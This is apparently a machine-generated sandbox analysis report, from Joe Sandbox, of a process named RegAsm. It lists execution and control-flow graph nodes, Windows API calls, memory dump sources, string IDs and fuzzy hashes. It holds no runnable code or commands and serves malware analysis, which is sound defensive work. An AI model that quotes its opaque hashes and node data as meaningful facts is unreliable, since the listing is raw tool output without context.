                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f647a12cb54b4f56878f7e1001cf255c4f8c14ed4d3c0f46ef98aed83742025
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D12113B1D006499FCF10DFAAC880AEEFBF4FF48310F10842AE919A7250C774A940CBA1

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:13.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:4.2%
                                                                                                                                                                                                                                          Total number of Nodes:189
                                                                                                                                                                                                                                          Total number of Limit Nodes:18
                                                                                                                                                                                                                                          execution_graph 55082 6cf1b38 55083 6cf1b52 55082->55083 55087 6cf1f48 55083->55087 55096 6cf1b88 55083->55096 55084 6cf1b6e 55088 6cf1f16 55087->55088 55089 6cf1f7e 55088->55089 55105 6cf8340 55088->55105 55110 6cf8330 55088->55110 55115 6cf8f08 55089->55115 55120 6cf8fa4 55089->55120 55125 6cf8ef8 55089->55125 55090 6cf1f8d 55090->55084 55098 6cf1bc5 55096->55098 55097 6cf1f7e 55100 6cf8ef8 6 API calls 55097->55100 55101 6cf8f08 6 API calls 55097->55101 55102 6cf8fa4 6 API calls 55097->55102 55098->55097 55103 6cf8340 LdrInitializeThunk 55098->55103 55104 6cf8330 LdrInitializeThunk 55098->55104 55099 6cf1f8d 55099->55084 55100->55099 55101->55099 55102->55099 55103->55098 55104->55098 55106 6cf8367 55105->55106 55130 6cf862a 55106->55130 55136 6cf85a7 55106->55136 55107 6cf83b0 55107->55088 55111 6cf8340 55110->55111 55113 6cf862a LdrInitializeThunk 55111->55113 55114 6cf85a7 LdrInitializeThunk 55111->55114 55112 6cf83b0 55112->55088 55113->55112 55114->55112 55117 6cf8f2f 55115->55117 55116 6cf8fd7 55116->55090 55117->55116 55146 8e7aa00 55117->55146 55155 8e7a9f0 55117->55155 55122 6cf8f72 55120->55122 55121 6cf8fd7 55121->55090 55122->55121 55123 8e7aa00 6 API calls 55122->55123 55124 8e7a9f0 6 API calls 55122->55124 55123->55122 55124->55122 55126 6cf8efc 55125->55126 55127 6cf8fd7 55126->55127 55128 8e7aa00 6 API calls 55126->55128 55129 8e7a9f0 6 API calls 55126->55129 55127->55090 55128->55126 55129->55126 55131 6cf863d 55130->55131 55142 6cf8b90 55131->55142 55133 6cf8706 55133->55107 55134 6cf8b90 LdrInitializeThunk 55134->55133 55137 6cf85d4 55136->55137 55141 6cf8b90 LdrInitializeThunk 55137->55141 55138 6cf869e 55140 6cf8b90 LdrInitializeThunk 55138->55140 55139 6cf8706 55139->55107 55140->55139 55141->55138 55143 6cf8bb7 55142->55143 55144 6cf8bef LdrInitializeThunk 55143->55144 55145 6cf869e 55143->55145 55144->55145 55145->55134 55147 8e7aa27 55146->55147 55148 8e7aa97 55147->55148 55164 8e7c97f 55147->55164 55168 8e7b570 55147->55168 55172 8e7b580 55147->55172 55176 8e7c020 55147->55176 55180 8e7c2cb 55147->55180 55184 8e7ca5e 55147->55184 55148->55117 55156 8e7aa00 55155->55156 55157 8e7aa97 55156->55157 55158 8e7c020 LdrInitializeThunk 55156->55158 55159 8e7b580 LdrInitializeThunk 55156->55159 55160 8e7b570 LdrInitializeThunk 55156->55160 55161 8e7c97f LdrInitializeThunk 55156->55161 55162 8e7ca5e LdrInitializeThunk 55156->55162 55163 8e7c2cb LdrInitializeThunk 55156->55163 55157->55117 55158->55157 55159->55157 55160->55157 55161->55157 55162->55157 55163->55157 55167 8e7b874 55164->55167 55165 8e7ca01 55165->55165 55166 8e7befb LdrInitializeThunk 55166->55167 55167->55165 55167->55166 55171 8e7b5ad 55168->55171 55169 8e7ca01 55169->55169 55170 8e7befb LdrInitializeThunk 55170->55171 55171->55169 55171->55170 55174 8e7b5ad 55172->55174 55173 8e7ca01 55173->55173 55174->55173 55175 8e7befb LdrInitializeThunk 55174->55175 55175->55174 55178 8e7b874 55176->55178 55177 8e7ca01 55177->55177 55178->55177 55179 8e7befb LdrInitializeThunk 55178->55179 55179->55178 55182 8e7b874 55180->55182 55181 8e7ca01 55181->55181 55182->55181 55183 8e7befb LdrInitializeThunk 55182->55183 55183->55182 55185 8e7b6e0 55184->55185 55186 8e7ca01 55185->55186 55187 8e7befb LdrInitializeThunk 55185->55187 55187->55185 55068 155d0b8 55069 155d0fe 55068->55069 55073 155d298 55069->55073 55076 155d289 55069->55076 55070 155d1eb 55079 155c9a0 55073->55079 55077 155d2c6 55076->55077 55078 155c9a0 DuplicateHandle 55076->55078 55077->55070 55078->55077 55080 155d300 DuplicateHandle 55079->55080 55081 155d2c6 55080->55081 55081->55070 55188 1554668 55189 1554684 55188->55189 55190 1554696 55189->55190 55194 15547a0 55189->55194 55199 1553e10 55190->55199 55195 15547c5 55194->55195 55203 15548a1 55195->55203 55207 15548b0 55195->55207 55200 1553e1b 55199->55200 55215 1555c54 55200->55215 55202 15546b5 55205 15548b0 55203->55205 55204 15549b4 55204->55204 55205->55204 55211 1554248 55205->55211 55209 15548d7 55207->55209 55208 15549b4 55208->55208 55209->55208 55210 1554248 CreateActCtxA 55209->55210 55210->55208 55212 1555940 CreateActCtxA 55211->55212 55214 1555a03 55212->55214 55214->55214 55216 1555c5f 55215->55216 55219 1555c64 55216->55219 55218 155709d 55218->55202 55220 1555c6f 55219->55220 55223 1555c94 55220->55223 55222 155717a 55222->55218 55224 1555c9f 55223->55224 55227 1555cc4 55224->55227 55226 155726d 55226->55222 55228 1555ccf 55227->55228 55230 1558653 55228->55230 55234 155ad00 55228->55234 55229 1558691 55229->55226 55230->55229 55238 155cdf0 55230->55238 55243 155cde0 55230->55243 55248 155ad38 55234->55248 55252 155ad28 55234->55252 55235 155ad16 55235->55230 55239 155ce11 55238->55239 55240 155ce35 55239->55240 55286 155cf90 55239->55286 55290 155cfa0 55239->55290 55240->55229 55244 155ce11 55243->55244 55245 155ce35 55244->55245 55246 155cf90 3 API calls 55244->55246 55247 155cfa0 3 API calls 55244->55247 55245->55229 55246->55245 55247->55245 55256 155ae30 55248->55256 55266 155ae20 55248->55266 55249 155ad47 55249->55235 55253 155ad47 55252->55253 55254 155ae30 2 API calls 55252->55254 55255 155ae20 2 API calls 55252->55255 55253->55235 55254->55253 55255->55253 55257 155ae41 55256->55257 55260 155ae64 55256->55260 55276 1559838 55257->55276 55260->55249 55261 155ae5c 55261->55260 55262 155b068 GetModuleHandleW 55261->55262 55263 155b095 55262->55263 55263->55249 55267 155ae30 55266->55267 55268 1559838 GetModuleHandleW 55267->55268 55270 155ae64 55267->55270 55269 155ae4c 55268->55269 55269->55270 55274 155b0c8 GetModuleHandleW 55269->55274 55275 155b0b8 GetModuleHandleW 55269->55275 55270->55249 55271 155ae5c 55271->55270 55272 155b068 GetModuleHandleW 55271->55272 55273 155b095 55272->55273 55273->55249 55274->55271 55275->55271 55277 155b020 GetModuleHandleW 55276->55277 55279 155ae4c 55277->55279 55279->55260 55280 155b0c8 55279->55280 55283 155b0b8 55279->55283 55281 1559838 GetModuleHandleW 55280->55281 55282 155b0dc 55281->55282 55282->55261 55284 1559838 GetModuleHandleW 55283->55284 55285 155b0dc 55283->55285 55284->55285 55285->55261 55287 155cfa0 55286->55287 55288 155cfe7 55287->55288 55294 155c8d8 55287->55294 55288->55240 55291 155cfad 55290->55291 55292 155cfe7 55291->55292 55293 155c8d8 3 API calls 55291->55293 55292->55240 55293->55292 55295 155c8dd 55294->55295 55297 155d8f8 55295->55297 55298 155ca04 55295->55298 55297->55297 55299 155ca0f 55298->55299 55300 1555cc4 3 API calls 55299->55300 55301 155d967 55300->55301 55301->55297 55061 6cf8490 55062 6cf849b 55061->55062 55063 6cf84ab 55062->55063 55065 6cf6714 55062->55065 55066 6cf84e0 OleInitialize 55065->55066 55067 6cf8544 55066->55067 55067->55063

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 735 8e7eca0-8e7ece1 737 8e7ece3-8e7eceb 735->737 738 8e7eced-8e7ecf1 735->738 739 8e7ecf6-8e7ecfb 737->739 738->739 740 8e7ed04-8e7ed0d 739->740 741 8e7ecfd-8e7ed02 739->741 742 8e7ed10-8e7ed12 740->742 741->742 743 8e7f07e-8e7f0a8 742->743 744 8e7ed18-8e7ed31 call 8e7eb18 742->744 768 8e7f0af-8e7f0ef 743->768 748 8e7ed33-8e7ed43 744->748 749 8e7ed7f-8e7ed86 744->749 750 8e7f016-8e7f033 748->750 751 8e7ed49-8e7ed61 748->751 753 8e7ed8b-8e7ed9b 749->753 754 8e7ed88 749->754 756 8e7f03c-8e7f045 750->756 755 8e7ed67-8e7ed6e 751->755 751->756 757 8e7ed9d-8e7eda9 753->757 758 8e7edab-8e7edc8 753->758 754->753 759 8e7ed74-8e7ed7e 755->759 760 8e7f04d-8e7f077 755->760 756->760 762 8e7edcc-8e7edd8 757->762 758->762 760->743 763 8e7edde 762->763 764 8e7edda-8e7eddc 762->764 767 8e7ede1-8e7ede3 763->767 764->767 767->768 769 8e7ede9-8e7edfe 767->769 800 8e7f0f6-8e7f136 768->800 771 8e7ee00-8e7ee0c 769->771 772 8e7ee0e-8e7ee2b 769->772 773 8e7ee2f-8e7ee3b 771->773 772->773 775 8e7ee44-8e7ee4d 773->775 776 8e7ee3d-8e7ee42 773->776 778 8e7ee50-8e7ee52 775->778 776->778 780 8e7eeda-8e7eede 778->780 781 8e7ee58 778->781 784 8e7ef12-8e7ef2a call 8e7e9e0 780->784 785 8e7eee0-8e7eefe 780->785 854 8e7ee5a call 8e7ec92 781->854 855 8e7ee5a call 8e7eca0 781->855 856 8e7ee5a call 8e7f198 781->856 804 8e7ef2f-8e7ef59 call 8e7eb18 784->804 785->784 797 8e7ef00-8e7ef0d call 8e7eb18 785->797 786 8e7ee60-8e7ee80 call 8e7eb18 794 8e7ee82-8e7ee8e 786->794 795 8e7ee90-8e7eead 786->795 798 8e7eeb1-8e7eebd 794->798 795->798 797->748 802 8e7eec6-8e7eecf 798->802 803 8e7eebf-8e7eec4 798->803 825 8e7f13d-8e7f1af 800->825 806 8e7eed2-8e7eed4 802->806 803->806 812 8e7ef5b-8e7ef67 804->812 813 8e7ef69-8e7ef86 804->813 806->780 806->800 814 8e7ef8a-8e7ef96 812->814 813->814 816 8e7ef9c 814->816 817 8e7ef98-8e7ef9a 814->817 818 8e7ef9f-8e7efa1 816->818 817->818 818->748 820 8e7efa7-8e7efb7 818->820 822 8e7efc7-8e7efe4 820->822 823 8e7efb9-8e7efc5 820->823 824 8e7efe8-8e7eff4 822->824 823->824 826 8e7eff6-8e7effb 824->826 827 8e7effd-8e7f006 824->827 836 8e7f1b1-8e7f1c1 825->836 837 8e7f1d9-8e7f1e8 825->837 828 8e7f009-8e7f00b 826->828 827->828 828->825 829 8e7f011 828->829 829->744 838 8e7f1c3-8e7f1d8 836->838 839 8e7f1e9-8e7f21f call 8e7eb18 836->839 843 8e7f227-8e7f22e 839->843 844 8e7f221-8e7f226 839->844 845 8e7f233-8e7f240 843->845 846 8e7f230 843->846 848 8e7f242 845->848 849 8e7f24e-8e7f259 845->849 846->845 852 8e7f244 call 8e7f2f0 848->852 853 8e7f244 call 8e7f2ec 848->853 851 8e7f24a-8e7f24d 852->851 853->851 854->786 855->786 856->786
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2245123004.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_8e70000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Haq$Haq$Haq$Haq$Haq
                                                                                                                                                                                                                                          • API String ID: 0-1792267638
                                                                                                                                                                                                                                          • Opcode ID: 1f74972e643cea7476b1717934d42dc9baea5e22c04aa01a6b048e4f9e1dd48f
                                                                                                                                                                                                                                          • Instruction ID: 6838f50b11c45a41406a39656b70db4ab982564e4ae1144e1e69706938260777
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f74972e643cea7476b1717934d42dc9baea5e22c04aa01a6b048e4f9e1dd48f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F602B332A04256CFCB19CF74D4502ADFBF2FF85305F2486AED406AB251DB749A86CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 957 8e7b580-8e7b5ab 958 8e7b5b2-8e7b64e 957->958 959 8e7b5ad 957->959 962 8e7b6a0-8e7ca42 958->962 963 8e7b650-8e7b69a 958->963 959->958 971 8e7b6e0-8e7b86f call 6cfbc40 962->971 972 8e7ca48-8e7ca6e 962->972 963->962 990 8e7c9e1-8e7c9fb 971->990 974 8e7ca70-8e7ca7c 972->974 975 8e7ca7d 972->975 974->975 979 8e7ca7e 975->979 979->979 992 8e7b874-8e7b9b8 990->992 993 8e7ca01-8e7ca25 990->993 1010 8e7b9eb-8e7ba32 992->1010 1011 8e7b9ba-8e7b9e6 992->1011 998 8e7ca26 993->998 998->998 1016 8e7ba57-8e7ba66 1010->1016 1017 8e7ba34-8e7ba55 1010->1017 1014 8e7ba79-8e7bc30 1011->1014 1039 8e7bc82-8e7bc8d 1014->1039 1040 8e7bc32-8e7bc7c 1014->1040 1023 8e7ba6c-8e7ba78 1016->1023 1017->1023 1023->1014 1197 8e7bc93 call 8e7cb89 1039->1197 1198 8e7bc93 call 8e7cb98 1039->1198 1040->1039 1042 8e7bc99-8e7bcfd 1047 8e7bd4f-8e7bd5a 1042->1047 1048 8e7bcff-8e7bd49 1042->1048 1210 8e7bd60 call 8e7cb89 1047->1210 1211 8e7bd60 call 8e7cb98 1047->1211 1048->1047 1049 8e7bd66-8e7bdc9 1055 8e7be1b-8e7be26 1049->1055 1056 8e7bdcb-8e7be15 1049->1056 1208 8e7be2c call 8e7cb89 1055->1208 1209 8e7be2c call 8e7cb98 1055->1209 1056->1055 1057 8e7be32-8e7be6b 1061 8e7c2e4-8e7c36b 1057->1061 1062 8e7be71-8e7bed4 1057->1062 1074 8e7c36d-8e7c3c3 1061->1074 1075 8e7c3c9-8e7c3d4 1061->1075 1070 8e7bed6 1062->1070 1071 8e7bedb-8e7bf2d LdrInitializeThunk call 8e7b2bc 1062->1071 1070->1071 1081 8e7bf32-8e7c05a call 8e7a198 call 8e7af90 call 8e78c94 call 8e78ca4 1071->1081 1074->1075 1206 8e7c3da call 8e7cb89 1075->1206 1207 8e7c3da call 8e7cb98 1075->1207 1076 8e7c3e0-8e7c46d 1091 8e7c46f-8e7c4c5 1076->1091 1092 8e7c4cb-8e7c4d6 1076->1092 1114 8e7c2c7-8e7c2e3 1081->1114 1115 8e7c060-8e7c0b2 1081->1115 1091->1092 1204 8e7c4dc call 8e7cb89 1092->1204 1205 8e7c4dc call 8e7cb98 1092->1205 1095 8e7c4e2-8e7c55a 1108 8e7c55c-8e7c5b2 1095->1108 1109 8e7c5b8-8e7c5c3 1095->1109 1108->1109 1202 8e7c5c9 call 8e7cb89 1109->1202 1203 8e7c5c9 call 8e7cb98 1109->1203 1111 8e7c5cf-8e7c63b 1126 8e7c68d-8e7c698 1111->1126 1127 8e7c63d-8e7c687 1111->1127 1114->1061 1124 8e7c104-8e7c17f 1115->1124 1125 8e7c0b4-8e7c0fe 1115->1125 1140 8e7c1d1-8e7c24b 1124->1140 1141 8e7c181-8e7c1cb 1124->1141 1125->1124 1199 8e7c69e call 8e7cb89 1126->1199 1200 8e7c69e call 8e7cb98 1126->1200 1127->1126 1129 8e7c6a4-8e7c6e9 1142 8e7c81f-8e7c9a0 1129->1142 1143 8e7c6ef-8e7c81e 1129->1143 1157 8e7c29d-8e7c2c6 1140->1157 1158 8e7c24d-8e7c297 1140->1158 1141->1140 1193 8e7c9a8-8e7c9c8 1142->1193 1143->1142 1157->1114 1158->1157 1194 8e7c9e0 1193->1194 1195 8e7c9ca-8e7c9df 1193->1195 1194->990 1195->1194 1197->1042 1198->1042 1199->1129 1200->1129 1202->1111 1203->1111 1204->1095 1205->1095 1206->1076 1207->1076 1208->1057 1209->1057 1210->1049 1211->1049
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2245123004.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_8e70000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c!
                                                                                                                                                                                                                                          • API String ID: 0-3867720870
                                                                                                                                                                                                                                          • Opcode ID: 9741898a2a1baed3efa247cdceed872b377e236a6912fdaf47730a4edc3e02cd
                                                                                                                                                                                                                                          • Instruction ID: a1c3a07dd6b8db471a425b6db30ad1c307ac7e4f89455b3b527aa57ed47a8464
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9741898a2a1baed3efa247cdceed872b377e236a6912fdaf47730a4edc3e02cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29C2AD74A012298FCB65DF24D998B9DB7B6FB89305F1081EAD90DA7350DB34AE85CF40

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1235 8e7cd10-8e7cd42 1236 8e7cd44 1235->1236 1237 8e7cd49-8e7ce15 1235->1237 1236->1237 1242 8e7ce17-8e7ce25 1237->1242 1243 8e7ce2a 1237->1243 1244 8e7d2d8-8e7d2e5 1242->1244 1306 8e7ce30 call 8e7d6c6 1243->1306 1307 8e7ce30 call 8e7d756 1243->1307 1308 8e7ce30 call 8e7d5d1 1243->1308 1309 8e7ce30 call 8e7d680 1243->1309 1245 8e7ce36-8e7cee6 1253 8e7d267-8e7d291 1245->1253 1255 8e7d297-8e7d2d6 1253->1255 1256 8e7ceeb-8e7d101 1253->1256 1255->1244 1283 8e7d10d-8e7d157 1256->1283 1286 8e7d15f-8e7d161 1283->1286 1287 8e7d159 1283->1287 1290 8e7d168-8e7d16f 1286->1290 1288 8e7d163 1287->1288 1289 8e7d15b-8e7d15d 1287->1289 1288->1290 1289->1286 1289->1288 1291 8e7d171-8e7d1e8 1290->1291 1292 8e7d1e9-8e7d20f 1290->1292 1291->1292 1294 8e7d211-8e7d21a 1292->1294 1295 8e7d21c-8e7d228 1292->1295 1297 8e7d22e-8e7d24d 1294->1297 1295->1297 1302 8e7d263-8e7d264 1297->1302 1303 8e7d24f-8e7d262 1297->1303 1302->1253 1303->1302 1306->1245 1307->1245 1308->1245 1309->1245
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2245123004.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_8e70000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: .$1
                                                                                                                                                                                                                                          • API String ID: 0-1839485796
                                                                                                                                                                                                                                          • Opcode ID: ec384cedd89f2286bb473c59c8de47117de1fc8fde9f01dd188ef8e33db2a381
                                                                                                                                                                                                                                          • Instruction ID: c2dfb3350f5fd727633095707800a2f409f443a9b2a266b4694e4ed611244851
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec384cedd89f2286bb473c59c8de47117de1fc8fde9f01dd188ef8e33db2a381
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0F1FF74E01229CFDB28DF65C894B9DBBB2FF89305F5081A9D40AA7294DB319E85CF11

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1310 6cfe270-6cfe2a1 1311 6cfe2a8-6cfe315 call 6cfb198 1310->1311 1312 6cfe2a3 1310->1312 1318 6cfe31a-6cfe367 1311->1318 1312->1311 1322 6cfe5a0-6cfe5b4 1318->1322 1324 6cfe36c-6cfe457 1322->1324 1325 6cfe5ba-6cfe5de 1322->1325 1340 6cfe534-6cfe544 1324->1340 1330 6cfe5df 1325->1330 1330->1330 1342 6cfe45c-6cfe472 1340->1342 1343 6cfe54a-6cfe574 1340->1343 1346 6cfe49c 1342->1346 1347 6cfe474-6cfe480 1342->1347 1351 6cfe576-6cfe57f 1343->1351 1352 6cfe580-6cfe581 1343->1352 1353 6cfe4a2-6cfe507 1346->1353 1349 6cfe48a-6cfe490 1347->1349 1350 6cfe482-6cfe488 1347->1350 1354 6cfe49a 1349->1354 1350->1354 1351->1352 1352->1322 1361 6cfe509-6cfe51f 1353->1361 1362 6cfe520-6cfe533 1353->1362 1354->1353 1361->1362 1362->1340
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q$PH]q
                                                                                                                                                                                                                                          • API String ID: 0-3791814328
                                                                                                                                                                                                                                          • Opcode ID: dfe3f1b2bae8d65b981d69471f85ca2160d5d13caa6b3c00c3719fc17374fda4
                                                                                                                                                                                                                                          • Instruction ID: 890f69a8f7b308389d2821be35865bfa28857e46f99d9f2e54310f1f0344b7d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfe3f1b2bae8d65b981d69471f85ca2160d5d13caa6b3c00c3719fc17374fda4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02A1F474E10219CFDB68DFA5C854B9EBBB2FF89300F2084A9D509AB264DB305A85CF51

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1365 6cfa280-6cfa2b0 1366 6cfa2b7-6cfa33e 1365->1366 1367 6cfa2b2 1365->1367 1371 6cfa362-6cfa37b call 6cf87f4 1366->1371 1372 6cfa340-6cfa35f 1366->1372 1367->1366 1376 6cfa4ff-6cfa515 1371->1376 1372->1371 1377 6cfa51b-6cfa53f 1376->1377 1378 6cfa380-6cfa3a6 1376->1378 1383 6cfa3ad-6cfa3dd 1378->1383 1384 6cfa3a8 1378->1384 1387 6cfa3df-6cfa3e8 1383->1387 1388 6cfa3fe 1383->1388 1384->1383 1389 6cfa3ef-6cfa3f2 1387->1389 1390 6cfa3ea-6cfa3ed 1387->1390 1391 6cfa401-6cfa48e 1388->1391 1392 6cfa3fc 1389->1392 1390->1392 1400 6cfa4db-6cfa4ec 1391->1400 1401 6cfa490-6cfa4a4 1391->1401 1392->1391 1404 6cfa4ed-6cfa4fc 1400->1404 1405 6cfa4ad-6cfa4d9 1401->1405 1404->1376 1405->1404
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          • Opcode ID: 60081dbcab630ee9eb02a0c93a8f6ef7f8e9ecddbdc2857cb8c72efb60398763
                                                                                                                                                                                                                                          • Instruction ID: 913c5219ba677b64c0e5a48661e238bd5cb3cfd519f44ed6a60c77c1526b2e04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60081dbcab630ee9eb02a0c93a8f6ef7f8e9ecddbdc2857cb8c72efb60398763
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D891F474E01218CFDB58DFAAD584A9DFBB2FF89305F20816AD409AB351DB359986CF04

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1409 8e7ab30-8e7ab61 1411 8e7ab63 1409->1411 1412 8e7ab68-8e7abfb call 8e7a198 call 6cfa280 1409->1412 1411->1412 1416 8e7ac4d-8e7ac8b 1412->1416 1417 8e7abfd-8e7ac47 1412->1417 1422 8e7ae04-8e7ae18 1416->1422 1417->1416 1425 8e7ac90-8e7ad14 1422->1425 1426 8e7ae1e-8e7ae42 1422->1426 1435 8e7ad16-8e7ad17 1425->1435 1436 8e7ad1c-8e7ad48 1425->1436 1435->1422 1439 8e7ad53-8e7ad61 1436->1439 1440 8e7ad67-8e7adef call 8e78c94 call 8e78ca4 1439->1440 1441 8e7adf0-8e7ae03 1439->1441 1440->1441 1441->1422
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2245123004.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_8e70000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: C#${#
                                                                                                                                                                                                                                          • API String ID: 0-2421752338
                                                                                                                                                                                                                                          • Opcode ID: 2b2e70282f4d0b61e68dca1dd3df3b221df06625cd4b5ca52828bc41ecf8d0df
                                                                                                                                                                                                                                          • Instruction ID: f8a8c59b40f72d3efa40b5e06a72317439225883447a44c0b31e4765c71219ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2e70282f4d0b61e68dca1dd3df3b221df06625cd4b5ca52828bc41ecf8d0df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8912370E01229CFDB64DFA8C994B9DFBB2FF49305F2091A9D509AB251DB305A89CF41
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: @B/
                                                                                                                                                                                                                                          • API String ID: 0-3863299084
                                                                                                                                                                                                                                          • Opcode ID: 35dab6998d899fae4cd211674ac3ed45501dfdd7e016ae8ee916c3ff43de81fe
                                                                                                                                                                                                                                          • Instruction ID: 441bc04b4a7b55bb7a9c9a5df26adfe8e60c13f106663fdcce1b961f51226115
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35dab6998d899fae4cd211674ac3ed45501dfdd7e016ae8ee916c3ff43de81fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5282AB74E112298FDBA4DF69C984BDDBBB2BB49301F1081EAD509A7351DB319E81CF50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: d6a372c41d824284c60126b3902f5b50cd455dfa9905d8df7eb09747d85ec184
                                                                                                                                                                                                                                          • Instruction ID: a1db7a775f6d8c37ef9817378c9112fc2a9c866b52c72a61609d90f987ecd1d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a372c41d824284c60126b3902f5b50cd455dfa9905d8df7eb09747d85ec184
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3125F34B002158FCB54EF69C9549AEBBF6FF89700B158169E906EB365DB30DC41CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
